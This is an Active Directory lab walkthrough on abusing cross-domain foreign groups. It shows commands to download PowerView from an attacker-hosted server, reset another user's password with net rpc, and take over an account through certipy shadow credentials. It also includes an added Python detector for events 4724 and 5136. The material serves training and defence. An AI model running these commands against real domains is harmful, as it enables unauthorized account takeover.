Foreign group and users
In BloodHound we can easily see that there is a link between the domains with the following query (careful: this query is fine in a lab, but it will certainly be a little too heavy in a real-world AD).
NewYork.Local

North.NewYork.Local

Maryland.Local

In the lab you will find some specific groups that let you pass from one domain to the other.
As you have already done the ACL part previously, you will easily find the way to exploit that.
newyork.local to maryland.local: group KGB
To do that, just pick a user from RadioCity and exploit with the KGB group.
RDP
xfreerdp /d:newyork.local /u:diego.montenegro /p:letsdothis /v:192.168.56.10 /cert-ignore
Downloading PowerView.ps1 to the ParrotOS lab machine
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Uploading it to the Windows Server
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\diego.montenegro\Documents\PowerView.ps1')
Get-NetGroupMember -Identity "KGB" -Domain Maryland.local
Change Teresa's password
net rpc password teresa.Perez -U newyork.local/diego.montenegro%letsdothis -S baltimore.maryland.local
Enter new password for teresa.Perez: <here we enter Password123>
And verify
crackmapexec smb 192.168.56.12 -u teresa.Perez -p 'Password123' -d maryland.local

We can also do that with shadow credentials (but auto will not work here; we will have to do it in two steps).
certipy shadow add -u diego.montenegro@newyork.local -p 'letsdothis' \
-dc-ip 192.168.56.12 -target baltimore.maryland.local -account 'teresa.perez'
certipy auth -pfx teresa.perez.pfx -username teresa.perez -domain maryland.local -dc-ip 192.168.56.12
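From the defender's side, both routes above leave a record on the target domain's DC: a password reset (Security event 4724) and a write to msDS-KeyCredentialLink (event 5136), each performed by an account from another domain. The following is an added example, not part of the original walkthrough, that flags both over constructed sample records; the NetBIOS names, the CN=Users path and the helpdesk/admin accounts are assumptions.

```python
# Constructed sample records shaped like the EventData fields of Windows
# Security events 4724 and 5136. NetBIOS names and the CN=Users path are assumed.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "diego.montenegro", "SubjectDomainName": "NEWYORK",
     "TargetUserName": "teresa.perez", "TargetDomainName": "MARYLAND"},
    {"EventID": 4724, "SubjectUserName": "helpdesk01", "SubjectDomainName": "MARYLAND",
     "TargetUserName": "some.user", "TargetDomainName": "MARYLAND"},
    {"EventID": 5136, "SubjectUserName": "diego.montenegro", "SubjectDomainName": "NEWYORK",
     "ObjectDN": "CN=teresa.perez,CN=Users,DC=maryland,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "admin", "SubjectDomainName": "MARYLAND",
     "ObjectDN": "CN=teresa.perez,CN=Users,DC=maryland,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136


def detect_cross_domain_takeover(events, local_netbios):
    """Return (rule, actor, target) tuples for events logged on a DC of local_netbios."""
    findings = []
    local = local_netbios.upper()
    for ev in events:
        actor_domain = ev.get("SubjectDomainName", "").upper()
        actor = actor_domain + "\\" + ev.get("SubjectUserName", "")
        if ev.get("EventID") == 4724:
            # Password reset where the resetting account lives in another domain.
            target_domain = ev.get("TargetDomainName", "").upper()
            if actor_domain and actor_domain != target_domain:
                target = target_domain + "\\" + ev.get("TargetUserName", "")
                findings.append(("foreign-password-reset", actor, target))
        elif ev.get("EventID") == 5136:
            # Key credential added to an object by a principal from another domain.
            attr = ev.get("AttributeLDAPDisplayName", "").lower()
            if (attr == "msds-keycredentiallink" and ev.get("OperationType") == VALUE_ADDED
                    and actor_domain and actor_domain != local):
                findings.append(("foreign-keycredential-write", actor, ev.get("ObjectDN", "")))
    return findings


if __name__ == "__main__":
    for finding in detect_cross_domain_takeover(SAMPLE_EVENTS, "MARYLAND"):
        print(finding)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object carries a matching SACL, so confirm both before relying on the second rule.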
Maryland to NewYork: group MainMultiDoms
In the same way, we can exploit the Maryland to NewYork foreign group.